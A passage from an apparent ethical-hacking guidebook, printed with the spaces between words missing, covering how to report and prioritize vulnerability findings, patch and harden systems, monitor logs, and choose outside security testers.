First,thispartcoversreportingthesecurityvulnerabilitiesyoudiscovertohelpgetmanagementbuy-inandhopefullymoremoneyinyourbudgettomakethingsright.Thispartthencoversgoodpracticesforpluggingthesecurityholeswithinyoursystems.Finally,thispartcoverswhatittakestomanagechangewithinyourinformationsystemsforlong-termsuccess,includingoutsourcingethicalhackingtohelpeasetheburdenofyourmassiveto-dolist!That’swhatworkingininformationsecurityisallaboutanyway,right?

Chapter17

ReportingYourResultsInThisChapter

Bringingyourtestdatatogether

Categorizingvulnerabilitiesyoudiscover

Documentingandpresentingtheresults

Ifyou’rewishingforabreakaftertesting,nowisn’tthetimetorestonyourlaurels.Thereportingphaseofyoursecurityassessmentisoneofthemostcriticalpieces.Thelastthingyouwanttodoistorunyourtests,findsecurityproblems,andleaveitatthat.Putyourtimeandefforttogoodusebythoroughlyanalyzinganddocumentingwhatyoufindtoensurethatsecurityvulnerabilitiesareeliminatedandyourinformationismoresecureasaresult.Reportingisanessentialelementoftheongoingvigilancethatinformationsecurityandriskmanagementrequires.

Reportingincludessiftingthroughallyourfindingstodeterminewhichvulnerabilitiesneedtobeaddressedandwhichonesdon’treallymatter.Reportingalsoincludesbriefingmanagementoryourclientonthevarioussecurityissuesyoufind,aswellasgivingspecificrecommendationsformakingimprovements.Yousharetheinformationyou’vegatheredandgivetheotherpartiesguidanceonwheretogofromthere.Reportingalsoshowsthatthetime,effort,andmoneyinvestedinthesecuritytestswereputtogooduse.

PullingtheResultsTogetherWhenyouhavegobsoftestdata—fromscreenshotsandmanualobservationsyoudocumentedtodetailedreportsgeneratedbythevariousvulnerabilityscannersyouused—whatdoyoudowithitall?Youneedtogothroughyourdocumentationwithafine-toothedcombandhighlightalltheareasthatstandout.Baseyourdecisionsonthefollowing:

VulnerabilityrankingsfromyourassessmenttoolsYourknowledgeasanIT/securityprofessionalThecontextofthevulnerabilityandhowitactuallyimpactsthebusiness

Sothatyoucanfindoutmoreinformationaboutthevulnerability,manyfeature-richsecuritytoolsassigneachvulnerabilityaranking(basedonoverallrisk),explainthevulnerability,givepossiblesolutions,andincluderelevantlinkstothefollowing:vendorsites,theCommonVulnerabilitiesandExposureswebsiteathttp://cve.mitre.org,andtheNationalVulnerabilitiesDatabaseathttps://nvd.nist.gov.Forfurtherresearch,youmightalsoneedtoreferenceyourvendor’ssite,othersupportsites,andonlineforumstoseewhetherthevulnerabilityaffectsyourparticularsystemandsituation.Overallbusinessriskisyourmainfocus.

Inyourfinalreportdocument,youmightwanttoorganizethevulnerabilitiesasshowninthefollowinglist:

NontechnicalfindingsSocialengineeringvulnerabilitiesPhysicalsecurityvulnerabilitiesITandsecurityoperationsvulnerabilities

TechnicalfindingsNetworkinfrastructureOperatingsystemsFirewallrulebasesDatabasesWebapplicationsMobileappsMobiledevices

Forfurtherclarity,youcancreateseparatesectionsinyourreportforinternaland

http://cve.mitre.org

http://nvd.nist.gov

externalsecurityvulnerabilitiesaswellashighandmoderatepriority.Onefinalnote:it’sgenerallyagoodideatovetyourfindingswithsystemownersfirsttoensurethatthey’reactuallyvalid.

PrioritizingVulnerabilitiesPrioritizingthesecurityvulnerabilitiesyoufindiscriticalbecausemanyissuesmightnotbefixable,andothersmightnotbeworthfixing.Youmightnotbeabletoeliminatesomevulnerabilitiesbecauseofvarioustechnicalreasons,andyoumightnotbeabletoaffordtoeliminateothers.Or,simplyenough,yourbusinessmayhaveacertainlevelofrisktolerance.Everysituationisdifferent.Youneedtofactorwhetherthebenefitisworththeeffortandcost.Ontheotherhand,spendingafewweeksworthofdevelopmenttimetofixcross-sitescriptingandSQLinjectionvulnerabilitiescouldbeworthalotofmoney,especiallyifyouendupgettingdingedbythird-partiesorlosepotentialcustomers.Thesamegoesformobiledevicesthateveryoneswearscontainnosensitiveinformation.Youneedtostudyeachvulnerabilitycarefully,determinethebusinessrisk,andweighwhethertheissueisworthfixing.

It’simpossible—oratleastnotworthtrying—tofixeveryvulnerabilitythatyoufind.Analyzeeachvulnerabilitycarefullyanddetermineyourworst-casescenarios.Soyouhavecross-siterequestforgery(CSRF)onyourprinter’swebinterface?What’sthebusinessrisk?PerhapsFTPisrunningonnumerousinternalservers.What’sthebusinessrisk?Formanysecurityflaws,you’lllikelyfindtheriskisjustnotthere.

I’vefoundthatwithsecurity—likemostareasoflife—youhavetofocusonyourhighestpayofftasks.Otherwise,you’lldriveyourselfnutsandprobablywon’tgetveryfarinmeetingyourowngoals.Here’saquickmethodtousewhenprioritizingyourvulnerabilities.Youcantweakthismethodtoaccommodateyourneeds.Youneedtoconsidertwomajorfactorsforeachofthevulnerabilitiesyoudiscover:

Likelihoodofexploitation:Howlikelyisitthatthespecificvulnerabilityyou’reanalyzingwillbetakenadvantageofbyahacker,amalicioususer,malware,orsomeotherthreat?Impactifexploited:Howdetrimentalwoulditbeifthevulnerabilityyou’reanalyzingwereexploited?

Manypeopleoftenskiptheseconsiderationsandassumethateveryvulnerabilitydiscoveredhastoberesolved.Bigmistake.Justbecauseavulnerabilityisdiscovereddoesn’tmeanitappliestoyourparticularsituationandenvironment.Ifyougoinwiththemindsetthateveryvulnerabilitywillbeaddressedregardlessofcircumstances,you’llwastealotofunnecessarytime,effort,andmoney,andyoucansetupyoursecurityassessmentprogramforfailureinthelongterm.However,becarefulnottoswingtoofarintheotherdirection!Manyvulnerabilitiesdon’tappeartooseriousonthesurfacebutcouldverywellgetyourorganizationintohotwaterifthey’reexploited.Digindeepandusesomecommonsense.

Rankeachvulnerability,usingcriteriasuchasHigh,Medium,andLowora1-through-5rating(where1isthelowestpriorityand5isthehighest)foreachofthetwoconsiderations.Table17-1showsasampletableandarepresentativevulnerabilityforeachcategory.

Table17-1PrioritizingVulnerabilities

HighLikelihood MediumLikelihood LowLikelihood

HighImpact

Sensitiveinformationstoredonanunencryptedlaptop

Tapebackupstakenoffsitethatarenotencryptedand/orpasswordprotected

NoadministratorpasswordonaninternalSQLServersystem

MediumImpact

Unencryptede-mailscontainingsensitiveinformationbeingsent

MissingWindowspatchonaninternalserverthatcanbeexploitedusingMetasploit

NopasswordsrequiredonseveralWindowsadministratoraccounts

LowImpact

OutdatedvirussignaturesonastandalonePCdedicatedtoInternetbrowsing

Employeesorvisitorsgainingunauthorizednetworkaccess

Weakencryptionciphersbeingusedonamarketingwebsite

ThevulnerabilityprioritizationshowninTable17-1isbasedonthequalitativemethodofassessingsecurityrisks.Inotherwords,it’ssubjective,basedonyourknowledgeofthesystemsandvulnerabilities.Youcanalsoconsideranyriskratingsyougetfromyoursecuritytools—justdon’trelysolelyonthem,becauseavendorcan’tprovideultimaterankingsofvulnerabilities.

CreatingReportsYoumayneedtoorganizeyourvulnerabilityinformationintoaformaldocumentformanagementorforyourclient.Thisisnotalwaysthecase,butit’softentheprofessionalthingtodoandshowsthatyoutakeyourworkseriously.Ferretoutthecriticalfindingsanddocumentthemsothatotherpartiescanunderstandthem.

Graphsandchartsareaplus.Screencapturesofyourfindings—especiallywhenit’sdifficulttosavethedatatoafile—addanicetouchtoyourreportsandshowtangibleevidencethattheproblemexists.

Documentthevulnerabilitiesinaconcise,nontechnicalmanner.Everyreportshouldcontainthefollowinginformation:

Date(s)thetestingwasperformedTeststhatwereperformedSummaryofthevulnerabilitiesdiscoveredPrioritizedlistofvulnerabilitiesthatneedtobeaddressedRecommendationsandspecificstepsonhowtoplugthesecurityholesfound

ItalwaysaddsvalueifyoucanperformanoperationalassessmentofIT/securityprocesses.Irecommendaddingalistofgeneralobservationsaroundweakbusinessprocesses,management’ssupportofITandsecurity,andsoonalongwithrecommendationsforaddressingeachissue.Youcanlookatthisassortofarootcauseanalysis.

Mostpeoplewantthefinalreporttoincludeasummaryofthefindings—noteverything.Thelastthingmostpeoplewanttodoissiftthrougha600pagePDFfilecontainingtechnicaljargonthatmeansverylittletothem.Manyconsultingfirmshavebeenknowntochargemegabucksforthisverytypeofreport.Andtheygetawaywithit.Butthatdoesn’tmakeitright.

Administratorsanddevelopersneedtherawdatareportsfromthesecuritytools.Thatway,theycanreferencethedatalaterwhentheyneedtoseespecificHTTPrequests/responses,detailsonmissingpatches,andsoon.

Aspartofthefinalreport,youmightwanttodocumentbehaviorsyouobservewhencarryingoutyoursecuritytests.Forexample,areemployeescompletelyobliviousorevenbelligerentwhenyoucarryoutanobvioussocialengineeringattack?DoestheITorsecuritystaffcompletelymisstechnicaltip-offs,suchastheperformanceofthe

networkdegradingduringtestingorvariousattacksappearinginsystemlogfiles?Youcanalsodocumentothersecurityissuesyouobserve,suchashowquicklyITstafformanagedserviceprovidersrespondtoyourtestsorwhethertheyrespondatall.Followingtherootcauseanalysisapproach,anymissing,incomplete,ornotfollowedproceduresneedtobedocumented.

Guardthefinalreporttokeepitsecurefrompeoplewhoarenotauthorizedtoseeit.Asecurityassessmentreportandtheassociateddataandsupportingfilesinthehandsofacompetitor,hacker,ormaliciousinsidercouldspelltroublefortheorganization.Herearesomewaystopreventthisfromhappening:

Deliverthereportandassociateddocumentationandfilesonlytothosewhohaveabusinessneedtoknow.Ifsendingthefinalreportelectronically,encryptallattachments,suchasdocumentationandtestresultsusinganencryptedZipformat,orsecurecloudfile-sharingservice.

Chapter18

PluggingSecurityHolesInThisChapter

Determiningwhichvulnerabilitiestoaddressfirst

Patchingyoursystems

Lookingatsecurityinanewlight

Afteryoucompleteyourtests,youwanttoheaddowntheroadtogreatersecurity.However,youfoundsomesecurityvulnerabilities—thingsthatneedtobeaddresses.(Ihopenottoomanyseriousones,though!)Pluggingthesesecurityholesbeforesomeoneexploitsthemisgoingtorequirealittleelbowgrease.Youneedtocomeupwithyourgameplananddecidewhichsecurityvulnerabilitiestoaddressfirst.Afewpatchesmightbeinorderandpossiblyevensomesystemhardening.Youmayneedtopurchasesomenewsecuritytechnologiesandmightwanttoreevaluateyournetworkdesignandsecurityinfrastructureaswell.Itouchonsomeofthecriticalareasinthischapter.

TurningYourReportsintoActionItmightseemthatthesecurityvulnerabilitytoaddressfirstwouldbeobvious,butit’softennotveryclear.Whenreviewingthevulnerabilitiesthatyoufind,considerthefollowingvariables:

HowcriticalthevulnerablesystemisWhatsensitiveinformationorbusinessprocessesareatstakeWhetherthevulnerabilitycanbefixedHoweasythevulnerabilityistofixWhetheryoucantakethesystemofflinetofixtheproblemWhattime,money,andeffortisinvolvedinpurchasingnewhardwareorsoftwareorretoolingbusinessprocessestoplugtheholes

InChapter17,Icoverthebasicissuesofdetermininghowimportantandhowurgentthesecurityproblemis.Infact,Iprovidereal-worldexamplesinTable17-1.Youshouldalsolookatsecurityfromatimemanagementperspectiveandaddresstheissuesthatarebothimportant(highimpact)andurgent(highlikelihood).Youprobablydon’twanttotrytofixthevulnerabilitiesthatarejusthighimpactorjusthighlikelihood.Youmighthavesomehighimpactvulnerabilitiesthat,likely,willneverbeexploited.Likewise,youprobablyhavesomevulnerabilitieswithahighlikelihoodofbeingexploitedthat,iftheyareexploited,won’treallymakeabigdifferenceinyourbusinessoryourjob.Thistypeofhumananalysisandperspectivewillhelpyoustandoutfromthescanandruntypeassessmentsthanmanypeopleperform(ofteninthenameofsomecomplianceregulation)andkeepyouemployedforsometimetocome!

Focusontaskswiththehighestpayofffirst—thosethatarebothhighimpactandhighlikelihood.Thiswilllikelybetheminorityofyourvulnerabilities.Afteryouplugthemostcriticalsecurityholes,youcangoafterthelessimportantandlessurgenttaskswhentimeandmoneypermit.Forexample,afteryouplugsuchcriticalholesasSQLinjectioninwebapplicationsandmissingpatchesonimportantservers,youmightwanttoreconfigureyourbackupswithpasswords,ifnotstrongencryption,tokeeppryingeyesawayincaseyourbackupsfallintothewronghands.

PatchingforPerfectionDoyoueverfeellikeallyoudoispatchyoursystemstofixsecurityvulnerabilities?Ifyouransweryestothisquestion,goodforyou—atleastyou’redoingit!Ifyouconstantlyfeelpressuretopatchyoursystemstherightwaybutcan’tseemtofindtime—atleastit’sonyourradar.ManyITprofessionalsandtheirmanagersdon’teventhinkaboutproactivelypatchingtheirsystemsuntilafterabreachoccurs.JustlookattheresearchintheVerizonDataBreachInvestigationsReport(amongothers).Patchmanagementisahugesecurityfailureacrossorganizationsinallindustries.Ifyou’rereadingthisbook,you’reobviouslyconcernedaboutsecurityandarehopefullywaypastthat.

Whateveryoudo,whatevertoolyouchoose,andwhateverproceduresworkbestinyourenvironment,keepyoursystemspatched!Thisgoesforoperatingsystems,webservers,databases,mobileapps,andevenfirmwareonyournetworkfirewalls,routers,andswitches.

Patchingisavoidablebutinevitable.Theonlyrealsolutiontoeliminatingtheneedforpatchesisdevelopingsecuresoftwareinthefirstplace,butthat’snotgoingtohappenanytimesoon,ifever.Softwareisjusttoocomplexforittobeperfect.Alargeportionofsecurityincidentscanbepreventedwithsomegoodpatchingpractices,sothere’ssimplynoreasonnottohaveasolidpatchmanagementprocessinplace.

PatchmanagementIfyoucan’tkeepupwiththedelugeofsecuritypatchesforallyoursystems,don’tdespair;youcanstillgetahandleontheproblem.Herearemybasictenetsforapplyingpatchestokeepyoursystemssecure:

Makesureallthepeopleanddepartmentsthatareinvolvedinapplyingpatchesonyourorganization’ssystemsareonthesamepageandfollowthesameprocedures.Haveformalanddocumentedproceduresinplaceforthesecriticalprocesses:

Obtainingpatchalertsfromyourvendors,includingthird-partypatchesforAdobe,Java,andsoon,whichareoftenoverlooked(andoftenthemostcritical)AssessingwhichpatchesaffectyoursystemsDeterminingwhentoapplypatches

Makeitpolicyandhaveproceduresinplacefortestingpatchesbeforeyouapplythemtoyourproductionservers.Testingpatchesafteryouapplythemisn’tasbigofadealonworkstations,butserversareadifferentstory.Manypatcheshave“undocumentedfeatures”andsubsequentunintendedsideeffects—believeme,I’veexperiencedthisbefore.Anuntestedpatchisaninvitationforsystem

termination!

PatchautomationThefollowingsectionsdescribethevariouspatchdeploymenttoolsyoucanusetolowertheburdenofconstantlyhavingtokeepupwithpatches.

CommercialtoolsIrecommendarobustpatch-automationapplication,especiallyifthesefactorsareinvolved:

AlargenetworkAnetworkwithamultitudeofoperatingsystems(Windows,Linux,MacOSX,andsoon)Alotofthird-partysoftwareapplications,suchasAdobeandJavaMorethanafewdozencomputers

Besuretocheckoutthesepatch-automationsolutions:

EcoraPatchManager(www.ecora.com/ecora/products/patchmanager.asp)GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)IBMBigFix(www-03.ibm.com/security/bigfix)ShavlikPatch(www.shavlik.com/products/patch)

FreetoolsUseoneofthesefreetoolstohelpwithautomatedpatching:

WindowsServerUpdateServices(WSUS)(http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx)WindowsUpdate,whichisbuiltintoMicrosoftWindowsoperatingsystemsMicrosoftBaselineSecurityAnalyzer(MBSA)(www.microsoft.com/technet/security/tools/mbsahome.mspx)Thebuilt-inpatchingtoolsforLinux-basedsystems(suchasYellowdogUpdater,Modified[yum]andYaSTOnlineUpdate)

http://www.ecora.com/ecora/products/patchmanager.asp


http://www-03.ibm.com/security/bigfix

http://www.shavlik.com/products/patch/

http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx

http://www.microsoft.com/technet/security/tools/mbsahome.mspx

HardeningYourSystemsInadditiontopatchingyoursystems,youhavetomakesureyoursystemsarehardened(lockeddown)fromthesecurityvulnerabilitiesthatpatchescan’tfix.I’vefoundthatmanypeoplestopwithpatching,thinkingtheirsystemsaresecure,butthat’sjustnotthecase.Throughouttheyears,I’veseennetworkadministratorsignorerecommendedhardeningpracticesfromsuchorganizationsastheNationalInstituteofStandardsandTechnology(NIST)(http://csrc.nist.gov/publications/PubsSPs.html)andtheCenterforInternetSecurity(www.cisecurity.org),leavingmanysecurityholeswideopen.However,I’matruebelieverthathardeningsystemsfrommaliciousattackisnotfoolproof,either.Becauseeverysystemandeveryorganization’sneedsaredifferent,thereisnoone-size-fits-allsolution,soyouhavetostrikeabalanceandnotrelyonanysingleoptiontoomuch.

It’sagoodideatorescanyoursystemsforvulnerabilitiesonceyourpatchesareapplied.

http://csrc.nist.gov/publications/PubsSPs.html


PayingthepiperIwasonceinvolvedinanincidentresponseprojectthatinvolvedover10,000Windowsserversandworkstationsbeinginfectedwithtargetedmalware.Advancedmalwarehadtakenafoothold.ThebusinessfoundtheinfectionearlyonandthoughttheITteamhadcleaneditup.Timepassed,andtheyrealizedayearorsolatertheyhadnotcleaneduptheentiremess.Themalwarehadcomebackwithavengeancetothepointwheretheirentirenetworkwasessentiallyundersurveillancebyforeign,state-sponsored,criminalhackers.

Afterdozensofpeoplespentmanyhoursgettingtotherootoftheproblem,itwasdeterminedthattheITdepartmenthadnotdonewhatitshould’vebeendoingintermsofpatchingandhardeningitssystemsfromtheget-go.Ontopofthat,therewasaseriouscommunicationbreakdownbetweenITandotherdepartments,includingsecurity,thehelpdesk,andbusinessoperations.Itwasacaseoftoolittletoolatethatendedupgettingaverylargebusinessintoaverylargebind.Thelessonhereisthatimproperlysecuredsystemscancreateatremendousburdenonyourbusiness.

Thisbookpresentshardeningcountermeasuresthatyoucanimplementforyournetwork,computers,andevenphysicalsystemsandpeople.Ifindthesecountermeasuresworkthebestfortherespectivesystems.

Implementingatleastthebasicsecuritypracticesiscritical.WhetherinstallingafirewallonthenetworkorrequiringuserstohavestrongpasswordsviaaWindowsdomainGPO—youmustaddressthebasicsifyouwantanymodicumofsecurity.Beyondpatching,ifyoufollowthecountermeasuresIdocument,addtheotherwell-knownsecuritypracticesfornetworksystems(routers,servers,workstations,andsoon)thatarefreelyavailableontheInternet,andperformongoingsecuritytests,youcanrestassuredthatyou’redoingyourbesttokeepyourorganization’sinformationsecure.

AssessingYourSecurityInfrastructureAreviewofyouroverallsecurityinfrastructurecanaddoomphtoyoursystems:

Lookathowyouroverallnetworkisdesigned.Considerorganizationalissues,suchaswhetherpoliciesareinplace,maintained,oreventakenseriously.Physicalissuescountaswell.Domembersofmanagementhavebuy-inoninformationsecurityandcompliance,ordotheysimplyshrugthemeasureoffasanunnecessaryexpenseorbarriertoconductingbusiness?

Mapyournetworkbyusingtheinformationyougatherfromthesecuritytestsinthisbook.Updatingexistingdocumentationisamajornecessity.OutlineIPaddresses,runningservices,andwhateverelseyoudiscover.Drawyournetworkdiagram—networkdesignandoverallsecurityissuesareawholeloteasiertoassesswhenyoucanworkwiththemvisually.AlthoughIprefertouseatechnicaldrawingprogram,suchasVisioorCheops-ng(http://cheops-ng.sourceforge.net),tocreatenetworkdiagrams,suchatoolisn’tnecessary.Youcandrawoutyourmaponawhiteboardlikemanypeopledoandthat’sjustfine.

Besuretoupdateyourdiagramswhenyournetworkchangesoratleastonceeveryyearorso.

Thinkaboutyourapproachtocorrectingvulnerabilitiesandincreasingyourorganization’soverallsecurity.Areyoufocusingallyoureffortsontheperimeterandnotonalayeredsecurityapproach?Thinkabouthowmostconveniencestoresandbanksareprotected.Securitycamerasfocusonthecashregisters,tellercomputers,andsurroundingareas—notjustontheparkinglotorentrances.Lookatsecurityfromadefensein-depthperspective.Makesurethatseverallayersofsecurityareinplaceincaseonemeasurefails,sotheattackermustgothroughotherbarrierstocarryoutasuccessfulattack.Thinkaboutsecuritypoliciesandproceduresatanorganizationallevel.Documentwhatsecuritypoliciesandproceduresareinplaceandwhetherthey’reeffective.Noorganizationisimmunetogapsinthisarea.Lookattheoverallsecurityculturewithinyourorganizationandseewhatitlookslikefromanoutsider’sperspective.Whatwouldcustomersorbusinesspartnersthinkabouthowyourorganizationtreatstheirsensitiveinformation?

Lookingatyoursecurityfromahigh-levelandnontechnicalperspectivegivesyouanewoutlookonsecurityholes.Ittakessometimeandeffortatfirst,butafteryouestablishabaselineofsecurity,it’smucheasiertomanagenewthreatsandvulnerabilities.

http://cheops-ng.sourceforge.net/

Chapter19

ManagingSecurityProcessesInThisChapter

Automatingtasks

Watchingformisbehavior

Outsourcingyoursecuritytesting

Keepingsecurityoneveryone’smind

Informationsecurityisanongoingprocessthatyoumustmanageeffectivelytobesuccessful.Thismanagementgoesbeyondperiodicallyapplyingpatchesandhardeningsystems.Performingyoursecuritytestsrepeatedlyiscritical;informationsecurityvulnerabilitiesemergeconstantly.Toputitanotherway,securitytestsarejustasnapshotofyouroverallinformationsecurity,soyouhavetoperformyourtestscontinuallytokeepupwiththelatestissues.Ongoingvigilanceisrequirednotonlyforcompliancewithvariouslawsandregulationsbutalsoforminimizingbusinessrisksrelatedtoyourinformationsystems.

AutomatingtheEthicalHackingProcessYoucanrunalargeportionofthefollowingethicalhackingtestsinthisbookautomatically:

Pingsweepsandportscanstoshowwhatsystemsareavailableandwhat’srunningPasswordcrackingteststoattemptaccesstoexternalwebapplications,remoteaccessservers,andsoonVulnerabilityscanstocheckformissingpatches,misconfigurations,andexploitableholesExploitationofvulnerabilities(toanextent,atleast)

Youmusthavetherighttoolstoautomatethesetests,forexample:

Somecommercialtoolscansetupperiodicassessmentsandcreatenicereportsforyouwithoutanyhands-onintervention—justalittlesetupandschedulingtimeupfront.ThisiswhyIlikemanyofthecommercial—andmostlyautomated—securitytestingtools,suchasNexposeandAppSpider.Theautomationyougetfromthesetoolsoftenhelpsjustifytheprice,especiallybecauseyoudon’thavetobeupat2:00a.m.oroncall24hoursadaytomonitorthetesting.Standalonesecuritytools,suchasNmap,JohntheRipper,andAircrack-ng,aregreatbuttheyaren’tenough.YoucanusetheWindowsTaskSchedulerandATcommandsonWindowssystemsandcronjobsonLinux-basedsystems,butmanualstepsandhumanintellectarestillrequired.

LinkstothesetoolsandmanyothersarelocatedintheAppendix.

Certaintestsandphases,suchasenumerationofnewsystems,variouswebapplicationtests,socialengineering,andphysicalsecuritywalkthroughs,simplycannotbesetonautopilot.Youhavetobeinvolved.

Eventhesmartestcomputer“expertsystem”can’taccomplishsecuritytests.Goodsecurityrequirestechnicalexpertise,experience,andgoodold-fashionedcommonsense.

MonitoringMaliciousUseMonitoringsecurity-relatedeventsisessentialforongoingsecurityefforts.Thiscanbeasbasicandmundaneasmonitoringlogfilesonrouters,firewalls,andcriticalserverseveryday.Advancedmonitoringmightincludeimplementingasecurityincidentandeventmanagement(SIEM)systemtomonitoreverylittlethingthat’shappeninginyourenvironment.Acommonmethodistodeployanintrusionpreventionsystem(IPS)ordatalossprevention(DLP)systemandmonitorformaliciousbehavior.

Theproblemwithmonitoringsecurity-relatedeventsisthathumansfinditveryboringandverydifficulttodoeffectively.Eachday,youcoulddedicateatime—suchasfirstthinginthemorning—tocheckingyourcriticallogfilesfromthepreviousnightorweekendtoferretoutintrusionsandothercomputerandnetworksecurityproblems.However,doyoureallywanttosubjectyourselforsomeoneelsetothatkindoftorture?

However,manuallysiftingthroughlogfilesprobablyisn’tthebestwaytomonitorthesystem.Considerthefollowingdrawbacks:

Findingcriticalsecurityeventsinsystemlogfilesisdifficult,ifnotimpossible.It’sjusttootediousataskfortheaveragehumantoaccomplisheffectively.Dependingonthetypeofloggingandsecurityequipmentyouuse,youmightnotevendetectsomesecurityevents,suchasIPSevasiontechniquesandexploitscarriedoutoverallowedportsonthenetwork.

Insteadofpanningthroughallyourlogfilesforhard-to-findintrusions,here’swhatIrecommend:

Enablesystemloggingwhereit’sreasonableandpossible.Youdon’tnecessarilyneedtocaptureallcomputerandnetworkevents,butyoushoulddefinitelylookforcertainobviousones,suchasloginfailures,policychanges,andunauthorizedfileaccess.Logsecurityeventsusingsyslog,awriteoncereadmany(WORM)device,oranothercentralserveronyournetwork.Donotkeeplogsonthelocalhost,ifpossible,tohelppreventthebadguysfromtamperingwithlogfilestocovertheirtracks.

Thefollowingareacoupleofgoodsolutionstothesecurity-monitoringdilemma:

Purchaseanevent-loggingsystem.Afewlow-pricedyeteffectivesolutionsare

available,suchasGFIEventsManager(www.gfi.com/products-and-solutions/network-security-solutions/gfi-eventsmanager).Typically,lower-pricedevent-loggingsystemsusuallysupportonlyoneOSplatform—MicrosoftWindowsisthemostcommon.Higher-endsolutions,suchasHPArcSightLogger(www8.hp.com/us/en/software-solutions/arcsight-logger-log-management),offerbothlogmanagementacrossvariousplatformsandeventcorrelationtohelptrackdownthesourceofsecurityproblemsandthevarioussystemsaffectedduringanincident.

Outsourcesecuritymonitoringtoathird-partymanagedsecurityservicesprovider(MSSP)inthecloud.DozensofMSSPswerearoundduringtheInternetboom,butonlyafewbigonesremain,suchasDellSecureWorks(www.secureworks.com)andAlertLogic(www.alertlogic.com).Nowconsideredcloudserviceproviders,thevalueinoutsourcingsecuritymonitoringisthatthesecompaniesoftenhavefacilitiesandtoolsthatyouwouldlikelynotbeabletoaffordandmaintain.Theyalsohaveanalystsworkingaroundtheclockandhavethesecurityexperienceandknowledgetheygainfromothercustomerstosharewithyou.

Whenthesecloudserviceprovidersdiscoverasecurityvulnerabilityorintrusion,theycanusuallyaddresstheissueimmediately,oftenwithoutyourinvolvement.Irecommendatleastcheckingwhetherthird-partyfirmsandtheirservicescanfreesomeofyourtimeandresourcessothatyoucanfocusonotherthings.Justdon’tdependsolelyontheirmonitoringefforts;acloudserviceprovidermayhavetroublecatchinginsiderabuse,socialengineeringattacks,andwebapplicationexploitsthatarecarriedoutoversecuredsessions(i.e.,HTTPS).Youstillneedtobeinvolved.

http://www.gfi.com/products-and-solutions/network-security-solutions/gfi-eventsmanager

http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management

http://www.secureworks.com

http://www.alertlogic.com/

OutsourcingSecurityAssessmentsOutsourcingyoursecurityassessmentsisverypopularandagreatwayfororganizationstogetanunbiasedthird-partyperspectiveoftheirinformationsecurity.Outsourcingallowsyoutohaveachecks-and-balancessystemthatclients,businesspartners,auditors,andregulatorsliketosee.

Outsourcingethicalhackingcanbeexpensive.Manyorganizationsspendtensofthousandsofdollars—oftenmore—dependingonthetestingneeded.However,doingallthisyourselfisn’tcheap—andquitepossiblyitisn’taseffective,either!

Alotofconfidentialinformationisatstake,soyoumusttrustyouroutsideconsultantsandvendors.Considerthefollowingquestionswhenlookingforanindependentexpertorvendortopartnerwith:

Isyoursecurityprovideronyoursideorathird-partyvendor’sside?Istheprovidertryingtosellyouproducts,oristheprovidervendorneutral?Manyprovidersmighttrytomakeafewmoredollarsoffthedealbutrecommendedproductsandservicesfromvendorstheypartnerwith,whichmightnotbenecessaryforyourneeds.Makesurethatthesepotentialconflictsofinterestaren’tbadforyourbudgetandyourbusiness.WhatotherITorsecurityservicesdoestheprovideroffer?Doestheproviderfocussolelyonsecurity?HavinganinformationsecurityspecialistdothistestingforyouisoftenbetterthanworkingwithanITgeneralistorganization.Afterall,wouldyouhireageneralcorporatelawyertohelpyouwithapatent,afamilypractitionertoperformsurgery,orahandymantorewireyourhouse?Whatareyourprovider’shiringandterminationpolicies?Lookformeasurestheprovidertakestominimizethechancesthatanemployeewillwalkoffwithyoursensitiveinformation.Doestheproviderunderstandyourbusinessneeds?Havetheproviderrepeatthelistofyourneedsandputtheminwritingtomakesureyou’rebothonthesamepage.Howwelldoestheprovidercommunicate?Doyoutrusttheprovidertokeepyouinformedandfollowupwithyouinatimelymanner?Doyouknowexactlywhowillperformthetests?Willonepersondothetesting,orwillsubject-matterexpertsfocusonthedifferentareas?Doestheproviderhavetheexperiencetorecommendpracticalandeffectivecountermeasurestothevulnerabilitiesfound?Theprovidershouldn’tjusthand

youathinkreportandsay,“Goodluckwithallthat!”Youneedrealisticsolutions.Whataretheprovider’smotives?Doyougettheimpressionthattheproviderisinbusinesstomakeaquickbuckofftheservices,withminimaleffortandvalueadded,oristheproviderinbusinesstobuildloyaltywithyouandestablishalong-termrelationship?

Findingagoodorganizationtoworkwithlong-termwillmakeyourongoingeffortsmuchsimpler.Askforseveralreferencesandsamplesanitizeddeliverables(thatis,reportsthatdon’tcontainsensitiveinformation)frompotentialproviders.Iftheorganizationcan’tproducethesewithoutdifficulty,lookforanotherprovider.

Yourprovidershouldhaveitsowncontractforyouthatincludesamutualnondisclosureverbiage.Makesureyoubothsignthistohelpprotectyourorganization.

Thinkingabouthiringareformedhacker?Formerhackers—I’mreferringtotheblackhathackerswhohavehackedintocomputersystemsinthepastandendedupservingtimeinprison—canbeverygoodatwhattheydo.Manypeopleswearbyhiringreformedhackerstodotheirtesting.Otherscomparethistohiringtheproverbialfoxtoguardthehenhouse.Ifyou’rethinkingaboutbringinginaformer(un)ethicalhackertotestyoursystems,considertheseissues:

Doyoureallywanttorewardmaliciousbehaviorwithyourorganization’sbusiness?

Ahackerclaimingtobe“reformed”doesn’tmeanheorsheis.Therecouldbedeep-rootedpsychologicalissuesorcharacterflawsyou’regoingtohavetocontendwith.Buyerbeware!

Informationgatheredandaccessedduringsecurityassessmentsissomeofthemostsensitiveinformationyourorganizationpossesses.Ifthisinformationgetsintothewronghands—eventenyearsdowntheroad—itcouldbeusedagainstyou.Somehackersandreformedcriminalshangoutintightsocialgroups.Youmightnotwantyourinformationsharedintheircircles.

Thatsaid,everyonedeservesachancetoexplainwhathappenedinthepast.Zerotoleranceissenseless.Listentohisorherstoryandusecommon-sensediscretionastowhetheryoutrustthepersontohelpyou.Thesupposedblackhathackeractuallymighthavebeenagrayhathackeroramisguidedwhitehathackerwhofitswellinyourorganization.

InstillingaSecurity-AwareMindsetYournetworkusersareoftenyourfirstandlastlineofdefense.Makesureyourethicalhackingeffortsandthemoneyspentonyourinformationsecurityinitiativesaren’twastedbecauseasimpleemployeeslip-upgaveamaliciousattackerthekeystothekingdom.

Thefollowingelementscanhelpestablishasecurity-awarecultureinyourorganization:

Makesecurityawarenessandongoingtraininganactiveprocessamongallemployeesandusersonyournetwork,includingmanagementandcontractors.One-timetrainingsuchaswhenemployeesareinitiallyhiredisnotenough.Awarenessandtrainingmustbeperiodicandconsistenttoensureyoursecuritymessagesarekeptatthetopofpeople’sminds.

